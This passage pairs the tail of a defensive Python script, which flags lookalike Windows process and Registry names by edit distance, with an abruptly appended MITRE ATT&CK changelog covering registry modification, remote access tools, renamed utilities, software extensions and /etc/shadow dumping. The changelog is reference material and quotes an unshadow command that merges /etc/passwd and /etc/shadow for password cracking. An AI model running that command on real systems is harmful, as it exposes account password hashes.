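    """Classic edit distance (insert/delete/substitute), O(len(a)*len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(name: str, location: str | None = None) -> tuple[str, str | None]:
    """Return (verdict, legitimate name matched).

    Verdicts: ok, wrong_location, lookalike, no_match. When the location is
    unknown (None) only the name is checked.
    """
    by_lower = {k.lower(): k for k in LEGITIMATE}
    lowered = name.lower()
    if lowered in by_lower:
        legit = by_lower[lowered]
        allowed = LEGITIMATE[legit]
        if allowed is None or location is None or location.lower().rstrip("\\") in allowed:
            return ("ok", legit)
        return ("wrong_location", legit)
    norm = normalize(name)
    best, best_dist = None, None
    for legit in LEGITIMATE:
        d = levenshtein(norm, normalize(legit))
        if best_dist is None or d < best_dist:
            best, best_dist = legit, d
    # Tolerance scales with length so short names do not collide with everything.
    limit = 1 if len(norm) < 8 else 2
    if best_dist is not None and best_dist <= limit:
        return ("lookalike", best)
    return ("no_match", None)


if __name__ == "__main__":
    temp = "c:\\users\\alice\\appdata\\local\\temp"
    for sample in [("svchost.exe", "c:\\windows\\system32"), ("svchost.exe", temp),
                   ("svch0st.exe", temp), ("isass.exe", "c:\\windows\\system32"),
                   ("Run0nce", None), ("kube-systern", None), ("notepad.exe", temp)]:
        print(sample, "->", classify(*sample))
```

Run it over process-creation events (image name plus directory), over the leaf names of autostart Registry keys, and over the namespace list from the cluster API; the `ok` verdict for a known name in an allowed directory is what separates this from a plain string match.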
[T1112] Modify Registry
Current version: 2.0
Version changed from: 1.4 → 2.0
Old description:
Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.
Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)
The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.
New description:
Adversaries may interact with the Windows Registry as part of a variety of other techniques to aid in defense evasion, persistence, and execution.
Access to specific areas of the Registry depends on account permissions, with some keys requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification.(Citation: Microsoft Reg) Other tools, such as remote access tools, may also contain functionality to interact with the Registry through the Windows API.
The Registry may be modified in order to hide configuration information or malicious payloads via [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).(Citation: Unit42 BabyShark Feb 2019)(Citation: Avaddon Ransomware 2021)(Citation: Microsoft BlackCat Jun 2022)(Citation: CISA Russian Gov Critical Infra 2018) The Registry may also be modified to [Impair Defenses](https://attack.mitre.org/techniques/T1562), such as by enabling macros for all Microsoft Office products, allowing privilege escalation without alerting the user, increasing the maximum number of allowed outbound requests, and/or modifying systems to store plaintext credentials in memory.(Citation: CISA LockBit 2023)(Citation: Unit42 BabyShark Feb 2019)
The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system.(Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.
Finally, Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API.(Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence.(Citation: TrendMicro POWELIKS AUG 2014)(Citation: SpectorOps Hiding Reg Jul 2017)
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Host forensic analysis'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-14 19:19:54.148000+00:00 | 2025-04-15 19:58:33.486000+00:00 |
description | Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.
Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)
The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication. | Adversaries may interact with the Windows Registry as part of a variety of other techniques to aid in defense evasion, persistence, and execution.
Access to specific areas of the Registry depends on account permissions, with some keys requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification.(Citation: Microsoft Reg) Other tools, such as remote access tools, may also contain functionality to interact with the Registry through the Windows API.
The Registry may be modified in order to hide configuration information or malicious payloads via [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).(Citation: Unit42 BabyShark Feb 2019)(Citation: Avaddon Ransomware 2021)(Citation: Microsoft BlackCat Jun 2022)(Citation: CISA Russian Gov Critical Infra 2018) The Registry may also be modified to [Impair Defenses](https://attack.mitre.org/techniques/T1562), such as by enabling macros for all Microsoft Office products, allowing privilege escalation without alerting the user, increasing the maximum number of allowed outbound requests, and/or modifying systems to store plaintext credentials in memory.(Citation: CISA LockBit 2023)(Citation: Unit42 BabyShark Feb 2019)
The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system.(Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.
Finally, Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API.(Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence.(Citation: TrendMicro POWELIKS AUG 2014)(Citation: SpectorOps Hiding Reg Jul 2017) |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.4 | 2.0 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
kill_chain_phases | | {'kill_chain_name': 'mitre-attack', 'phase_name': 'persistence'} |
external_references | | {'source_name': 'CISA Russian Gov Critical Infra 2018', 'description': 'CISA. (2018, March 16). Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved March 24, 2025.', 'url': 'https://www.cisa.gov/news-events/alerts/2018/03/15/russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors'} |
external_references | | {'source_name': 'CISA LockBit 2023', 'description': 'CISA. (2023, March 16). #StopRansomware: LockBit 3.0. Retrieved March 24, 2025.', 'url': 'https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a'} |
external_references | | {'source_name': 'Avaddon Ransomware 2021', 'description': 'Javier Yuste and Sergio Pastrana. (2021). Avaddon ransomware: an in-depth analysis and decryption of infected systems. Retrieved March 24, 2025.', 'url': 'https://arxiv.org/pdf/2102.04796'} |
external_references | | {'source_name': 'Microsoft BlackCat Jun 2022', 'description': 'Microsoft Defender Threat Intelligence. (2022, June 13). The many lives of BlackCat ransomware. Retrieved December 20, 2022.', 'url': 'https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/'} |
external_references | | {'source_name': 'Unit42 BabyShark Feb 2019', 'description': 'Unit 42. (2019, February 22). New BabyShark Malware Targets U.S. National Security Think Tanks. Retrieved October 7, 2019.', 'url': 'https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/'} |
x_mitre_contributors | | Gerardo Santos |
[T1219] Remote Access Tools
Current version: 3.0
Version changed from: 2.3 → 3.0
t | An adversary may use legitimate desktop support and remote a | t | An adversary may use legitimate remote access tools to estab |
| ccess software to establish an interactive command and contr | | lish an interactive command and control channel within a net |
| ol channel to target systems within networks. These services | | work. Remote access tools create a session between two trust |
| , such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, | | ed hosts through a graphical interface, a command line inter |
| `LogMein`, `AmmyyAdmin`, and other remote monitoring and man | | action, a protocol tunnel via development or management soft |
| agement (RMM) tools, are commonly used as legitimate technic | | ware, or hardware-level access such as KVM (Keyboard, Video, |
| al support software and may be allowed by application contro | | Mouse) over IP solutions. Desktop support software (usually |
| l within a target environment.(Citation: Symantec Living off | | graphical interface) and remote management software (typica |
| the Land)(Citation: CrowdStrike 2015 Global Threat Report)( | | lly command line interface) allow a user to control a comput |
| Citation: CrySyS Blog TeamSpy) Remote access software may b | | er remotely as if they are a local user inheriting the user |
| e installed and used post-compromise as an alternate communi | | or software permissions. This software is commonly used for |
| cations channel for redundant access or as a way to establis | | troubleshooting, software installation, and system managemen |
| h an interactive remote desktop session with the target syst | | t.(Citation: Symantec Living off the Land)(Citation: CrowdSt |
| em. They may also be used as a component of malware to estab | | rike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSp |
| lish a reverse connection or back-connect to a service or ad | | y) Adversaries may similarly abuse response features include |
| versary-controlled system. Adversaries may similarly abuse | | d in EDR and other defensive tools that enable remote access |
| response features included in EDR and other defensive tools | | . Remote access tools may be installed and used post-compro |
| that enable remote access. Installation of many remote acc | | mise as an alternate communications channel for redundant ac |
| ess software may also include persistence (e.g., the softwar | | cess or to establish an interactive remote desktop session w |
| e's installation routine creates a [Windows Service](https:/ | | ith the target system. It may also be used as a malware comp |
| /attack.mitre.org/techniques/T1543/003)). Remote access modu | | onent to establish a reverse connection or back-connect to a |
| les/features may also exist as part of otherwise existing so | | service or adversary-controlled system. Installation of ma |
| ftware (e.g., Google Chrome’s Remote Desktop).(Citation: Goo | | ny remote access tools may also include persistence (e.g., t |
| gle Chrome Remote Desktop)(Citation: Chrome Remote Desktop) | | he software's installation routine creates a [Windows Servic |
| | | e](https://attack.mitre.org/techniques/T1543/003)). Remote a |
| | | ccess modules/features may also exist as part of otherwise e |
| | | xisting software (e.g., Google Chrome’s Remote Desktop).(Cit |
| | | ation: Google Chrome Remote Desktop)(Citation: Chrome Remote |
| | | Desktop) |
New Mitigations:
- M1034: Limit Hardware Installation
New Detections:
- DS0016: Drive (Drive Creation)
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-12 23:52:30.489000+00:00 | 2025-04-15 19:58:25.651000+00:00 |
name | Remote Access Software | Remote Access Tools |
description | An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.(Citation: Symantec Living off the Land)(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy)
Remote access software may be installed and used post-compromise as an alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary-controlled system.
Adversaries may similarly abuse response features included in EDR and other defensive tools that enable remote access.
Installation of many remote access software may also include persistence (e.g., the software's installation routine creates a [Windows Service](https://attack.mitre.org/techniques/T1543/003)). Remote access modules/features may also exist as part of otherwise existing software (e.g., Google Chrome’s Remote Desktop).(Citation: Google Chrome Remote Desktop)(Citation: Chrome Remote Desktop) | An adversary may use legitimate remote access tools to establish an interactive command and control channel within a network. Remote access tools create a session between two trusted hosts through a graphical interface, a command line interaction, a protocol tunnel via development or management software, or hardware-level access such as KVM (Keyboard, Video, Mouse) over IP solutions. Desktop support software (usually graphical interface) and remote management software (typically command line interface) allow a user to control a computer remotely as if they are a local user inheriting the user or software permissions. This software is commonly used for troubleshooting, software installation, and system management.(Citation: Symantec Living off the Land)(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy) Adversaries may similarly abuse response features included in EDR and other defensive tools that enable remote access.
Remote access tools may be installed and used post-compromise as an alternate communications channel for redundant access or to establish an interactive remote desktop session with the target system. It may also be used as a malware component to establish a reverse connection or back-connect to a service or adversary-controlled system.
Installation of many remote access tools may also include persistence (e.g., the software's installation routine creates a [Windows Service](https://attack.mitre.org/techniques/T1543/003)). Remote access modules/features may also exist as part of otherwise existing software (e.g., Google Chrome’s Remote Desktop).(Citation: Google Chrome Remote Desktop)(Citation: Chrome Remote Desktop) |
x_mitre_version | 2.3 | 3.0 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_data_sources | | Drive: Drive Creation |
[T1036.003] Masquerading: Rename Legitimate Utilities
Current version: 2.0
Version changed from: 1.1 → 2.0
t | Adversaries may rename legitimate system utilities to try to | t | Adversaries may rename legitimate / system utilities to try |
| evade security mechanisms concerning the usage of those uti | | to evade security mechanisms concerning the usage of those u |
| lities. Security monitoring and control mechanisms may be in | | tilities. Security monitoring and control mechanisms may be |
| place for system utilities adversaries are capable of abusi | | in place for legitimate utilities adversaries are capable of |
| ng. (Citation: LOLBAS Main Site) It may be possible to bypas | | abusing, including both built-in binaries and tools such as |
| s those security mechanisms by renaming the utility prior to | | PSExec, AutoHotKey, and IronPython.(Citation: LOLBAS Main S |
| utilization (ex: rename <code>rundll32.exe</code>). (Citati | | ite)(Citation: Huntress Python Malware 2025)(Citation: The D |
| on: Elastic Masquerade Ball) An alternative case occurs when | | FIR Report AutoHotKey 2023)(Citation: Splunk Detect Renamed |
| a legitimate utility is copied or moved to a different dire | | PSExec) It may be possible to bypass those security mechanis |
| ctory and renamed to avoid detections based on system utilit | | ms by renaming the utility prior to utilization (ex: rename |
| ies executing from non-standard paths. (Citation: F-Secure C | | <code>rundll32.exe</code>).(Citation: Elastic Masquerade Bal |
| ozyDuke) | | l) An alternative case occurs when a legitimate utility is c |
| | | opied or moved to a different directory and renamed to avoid |
| | | detections based on these utilities executing from non-stan |
| | | dard paths.(Citation: F-Secure CozyDuke) |
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_contributors | | ['Matt Anderson, @nosecurething, Huntress'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-12 19:30:45.065000+00:00 | 2025-04-15 19:59:02.921000+00:00 |
name | Rename System Utilities | Rename Legitimate Utilities |
description | Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename rundll32.exe). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke) | Adversaries may rename legitimate / system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for legitimate utilities adversaries are capable of abusing, including both built-in binaries and tools such as PSExec, AutoHotKey, and IronPython.(Citation: LOLBAS Main Site)(Citation: Huntress Python Malware 2025)(Citation: The DFIR Report AutoHotKey 2023)(Citation: Splunk Detect Renamed PSExec) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename rundll32.exe).(Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on these utilities executing from non-standard paths.(Citation: F-Secure CozyDuke) |
x_mitre_version | 1.1 | 2.0 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Huntress Python Malware 2025', 'description': 'Matthew Brennan. (2024, July 5). Snakes on a Domain: An Analysis of a Python Malware Loader. Retrieved April 3, 2025.', 'url': 'https://www.huntress.com/blog/snakes-on-a-domain-an-analysis-of-a-python-malware-loader'} |
external_references | | {'source_name': 'Splunk Detect Renamed PSExec', 'description': 'Splunk. (2025, February 24). Detection: Detect Renamed PSExec. Retrieved April 3, 2025.', 'url': 'https://research.splunk.com/endpoint/683e6196-b8e8-11eb-9a79-acde48001122/'} |
external_references | | {'source_name': 'The DFIR Report AutoHotKey 2023', 'description': 'The DFIR Report. (2023, February 6). Collect, Exfiltrate, Sleep, Repeat. Retrieved April 3, 2025.', 'url': 'https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/'} |
[T1176] Software Extensions
Current version: 2.0
Version changed from: 1.3 → 2.0
t | Adversaries may abuse Internet browser extensions to establi | t | Adversaries may abuse software extensions to establish persi |
| sh persistent access to victim systems. Browser extensions o | | stent access to victim systems. Software extensions are modu |
| r plugins are small programs that can add functionality and | | lar components that enhance or customize the functionality o |
| customize aspects of Internet browsers. They can be installe | | f software applications, including web browsers, Integrated |
| d directly or through a browser's app store and generally ha | | Development Environments (IDEs), and other platforms.(Citati |
| ve access and permissions to everything that the browser can | | on: Chrome Extension C2 Malware)(Citation: Abramovsky VSCode |
| access.(Citation: Wikipedia Browser Extension)(Citation: Ch | | Security) Extensions are typically installed via official m |
| rome Extensions Definition) Malicious extensions can be ins | | arketplaces, app stores, or manually loaded by users, and th |
| talled into a browser through malicious app store downloads | | ey often inherit the permissions and access levels of the ho |
| masquerading as legitimate extensions, through social engine | | st application. Malicious extensions can be introduced |
| ering, or by an adversary that has already compromised a sys | | through various methods, including social engineering, compr |
| tem. Security can be limited on browser app stores so it may | | omised marketplaces, or direct installation by users or by a |
| not be difficult for malicious extensions to defeat automat | | dversaries who have already gained access to a system. Malic |
| ed scanners.(Citation: Malicious Chrome Extension Numbers) D | | ious extensions can be named similarly or identically to ben |
| epending on the browser, adversaries may also manipulate an | | ign extensions in marketplaces. Security mechanisms in exten |
| extension's update url to install updates from an adversary | | sion marketplaces may be insufficient to detect malicious co |
| controlled server or manipulate the mobile configuration fil | | mponents, allowing adversaries to bypass automated scanners |
| e to silently install additional extensions. Previous to ma | | or exploit trust established during the installation process |
| cOS 11, adversaries could silently install browser extension | | . Adversaries may also abuse benign extensions to achieve th |
| s via the command line using the <code>profiles</code> tool | | eir objectives, such as using legitimate functionality to tu |
| to install malicious <code>.mobileconfig</code> files. In ma | | nnel data or bypass security controls. The modular nature |
| cOS 11+, the use of the <code>profiles</code> tool can no lo | | of extensions and their integration with host applications m |
| nger install configuration profiles, however <code>.mobileco | | ake them an attractive target for adversaries seeking to exp |
| nfig</code> files can be planted and installed with user int | | loit trusted software ecosystems. Detection can be challengi |
| eraction.(Citation: xorrior chrome extensions macOS) Once t | | ng due to the inherent trust placed in extensions during ins |
| he extension is installed, it can browse to websites in the | | tallation and their ability to blend into normal application |
| background, steal all information that a user enters into a | | workflows. |
| browser (including credentials), and be used as an installer | | |
| for a RAT for persistence.(Citation: Chrome Extension Crypt | | |
| o Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banke | | |
| r Google Chrome Extension Steals Creds)(Citation: Catch All | | |
| Chrome Extension) There have also been instances of botnets | | |
| using a persistent backdoor through malicious Chrome extens | | |
| ions for [Command and Control](https://attack.mitre.org/tact | | |
| ics/TA0011).(Citation: Stantinko Botnet)(Citation: Chrome Ex | | |
| tension C2 Malware) Adversaries may also use browser extensi | | |
| ons to modify browser permissions and components, privacy se | | |
| ttings, and other security controls for [Defense Evasion](ht | | |
| tps://attack.mitre.org/tactics/TA0005).(Citation: Browers Fr | | |
| iarFox)(Citation: Browser Adrozek) | | |
New Detections:
- DS0029: Network Traffic (Network Traffic Flow)
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-12 19:48:15.871000+00:00 | 2025-04-15 19:58:22.784000+00:00 |
name | Browser Extensions | Software Extensions |
description | Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)
Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.
Previous to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS)
Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension)
There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions for [Command and Control](https://attack.mitre.org/tactics/TA0011).(Citation: Stantinko Botnet)(Citation: Chrome Extension C2 Malware) Adversaries may also use browser extensions to modify browser permissions and components, privacy settings, and other security controls for [Defense Evasion](https://attack.mitre.org/tactics/TA0005).(Citation: Browers FriarFox)(Citation: Browser Adrozek) | Adversaries may abuse software extensions to establish persistent access to victim systems. Software extensions are modular components that enhance or customize the functionality of software applications, including web browsers, Integrated Development Environments (IDEs), and other platforms.(Citation: Chrome Extension C2 Malware)(Citation: Abramovsky VSCode Security) Extensions are typically installed via official marketplaces, app stores, or manually loaded by users, and they often inherit the permissions and access levels of the host application.
Malicious extensions can be introduced through various methods, including social engineering, compromised marketplaces, or direct installation by users or by adversaries who have already gained access to a system. Malicious extensions can be named similarly or identically to benign extensions in marketplaces. Security mechanisms in extension marketplaces may be insufficient to detect malicious components, allowing adversaries to bypass automated scanners or exploit trust established during the installation process. Adversaries may also abuse benign extensions to achieve their objectives, such as using legitimate functionality to tunnel data or bypass security controls.
The modular nature of extensions and their integration with host applications make them an attractive target for adversaries seeking to exploit trusted software ecosystems. Detection can be challenging due to the inherent trust placed in extensions during installation and their ability to blend into normal application workflows. |
external_references[1]['source_name'] | Chrome Extension Crypto Miner | Abramovsky VSCode Security |
external_references[1]['description'] | Brinkmann, M. (2017, September 19). First Chrome extension with JavaScript Crypto Miner detected. Retrieved November 16, 2017. | Abramovsky, O. (2023, May 16). VSCode Security: Malicious Extensions Detected- More Than 45,000 Downloads- PII Exposed, and Backdoors Enabled. Retrieved March 30, 2025. |
external_references[1]['url'] | https://www.ghacks.net/2017/09/19/first-chrome-extension-with-javascript-crypto-miner-detected/ | https://blog.checkpoint.com/securing-the-cloud/malicious-vscode-extensions-with-more-than-45k-downloads-steal-pii-and-enable-backdoors/ |
x_mitre_version | 1.3 | 2.0 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_data_sources | | Network Traffic: Network Traffic Flow |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
external_references | {'source_name': 'Chrome Extensions Definition', 'description': 'Chrome. (n.d.). What are Extensions?. Retrieved November 16, 2017.', 'url': 'https://developer.chrome.com/extensions'} | |
external_references | {'source_name': 'ICEBRG Chrome Extensions', 'description': 'De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL BUSINESSES. Retrieved January 17, 2018.', 'url': 'https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses'} | |
external_references | {'source_name': 'Malicious Chrome Extension Numbers', 'description': 'Jagpal, N., et al. (2015, August). Trends and Lessons from Three Years Fighting Malicious Extensions. Retrieved November 17, 2017.', 'url': 'https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf'} | |
external_references | {'source_name': 'Catch All Chrome Extension', 'description': 'Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension Steals All Posted Data. Retrieved November 16, 2017.', 'url': 'https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/)'} | |
external_references | {'source_name': 'Banker Google Chrome Extension Steals Creds', 'description': 'Marinho, R. (n.d.). (Banker(GoogleChromeExtension)).targeting. Retrieved November 18, 2017.', 'url': 'https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/'} | |
external_references | {'source_name': 'Browser Adrozek', 'description': 'Microsoft Threat Intelligence. (2020, December 10). Widespread malware campaign seeks to silently inject ads into search results, affects multiple browsers. Retrieved February 26, 2024.', 'url': 'https://www.microsoft.com/en-us/security/blog/2020/12/10/widespread-malware-campaign-seeks-to-silently-inject-ads-into-search-results-affects-multiple-browsers/'} | |
external_references | {'source_name': 'Browers FriarFox', 'description': 'Raggi, Michael. Proofpoint Threat Research Team. (2021, February 25). TA413 Leverages New FriarFox Browser Extension to Target the Gmail Accounts of Global Tibetan Organizations. Retrieved February 26, 2024.', 'url': 'https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global'} | |
external_references | {'source_name': 'Stantinko Botnet', 'description': 'Vachon, F., Faou, M. (2017, July 20). Stantinko: A massive adware campaign operating covertly since 2012. Retrieved November 16, 2017.', 'url': 'https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/'} | |
external_references | {'source_name': 'Wikipedia Browser Extension', 'description': 'Wikipedia. (2017, October 8). Browser Extension. Retrieved January 11, 2018.', 'url': 'https://en.wikipedia.org/wiki/Browser_extension'} | |
Minor Version Changes
[T1003.008] OS Credential Dumping: /etc/passwd and /etc/shadow
Current version: 1.2
Version changed from: 1.1 → 1.2
t | Adversaries may attempt to dump the contents of <code>/etc/p | t | Adversaries may attempt to dump the contents of <code>/etc/p |
| asswd</code> and <code>/etc/shadow</code> to enable offline | | asswd</code> and <code>/etc/shadow</code> to enable offline |
| password cracking. Most modern Linux operating systems use a | | password cracking. Most modern Linux operating systems use a |
| combination of <code>/etc/passwd</code> and <code>/etc/shad | | combination of <code>/etc/passwd</code> and <code>/etc/shad |
| ow</code> to store user account information including passwo | | ow</code> to store user account information, including passw |
| rd hashes in <code>/etc/shadow</code>. By default, <code>/et | | ord hashes in <code>/etc/shadow</code>. By default, <code>/e |
| c/shadow</code> is only readable by the root user.(Citation: | | tc/shadow</code> is only readable by the root user.(Citation |
| Linux Password and Shadow File Formats) The Linux utility, | | : Linux Password and Shadow File Formats) Linux stores user |
| unshadow, can be used to combine the two files in a format | | information such as user ID, group ID, home directory path, |
| suited for password cracking utilities such as John the Ripp | | and login shell in <code>/etc/passwd</code>. A "user" on th |
| er:(Citation: nixCraft - John the Ripper) <code># /usr/bin/u | | e system may belong to a person or a service. All password h |
| nshadow /etc/passwd /etc/shadow > /tmp/crack.password.db</co | | ashes are stored in <code>/etc/shadow</code> - including ent |
| de> | | ries for users with no passwords and users with locked or di |
| | | sabled accounts.(Citation: Linux Password and Shadow File Fo |
| | | rmats) Adversaries may attempt to read or dump the <code>/e |
| | | tc/passwd</code> and <code>/etc/shadow</code> files on Linux |
| | | systems via command line utilities such as the <code>cat</c |
| | | ode> command.(Citation: Arctic Wolf) Additionally, the Linux |
| | | utility <code>unshadow</code> can be used to combine the tw |
| | | o files in a format suited for password cracking utilities s |
| | | uch as John the Ripper - for example, via the command <code> |
| | | /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.passw |
| | | ord.db</code>(Citation: nixCraft - John the Ripper). Since t |
| | | he user information stored in <code>/etc/passwd</code> are l |
| | | inked to the password hashes in <code>/etc/shadow</code>, an |
| | | adversary would need to have access to both. |
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-25 20:48:04.491000+00:00 | 2025-04-15 19:59:09.955000+00:00 |
description | Adversaries may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd and /etc/shadow to store user account information including password hashes in /etc/shadow. By default, /etc/shadow is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) # /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db
| Adversaries may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd and /etc/shadow to store user account information, including password hashes in /etc/shadow. By default, /etc/shadow is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
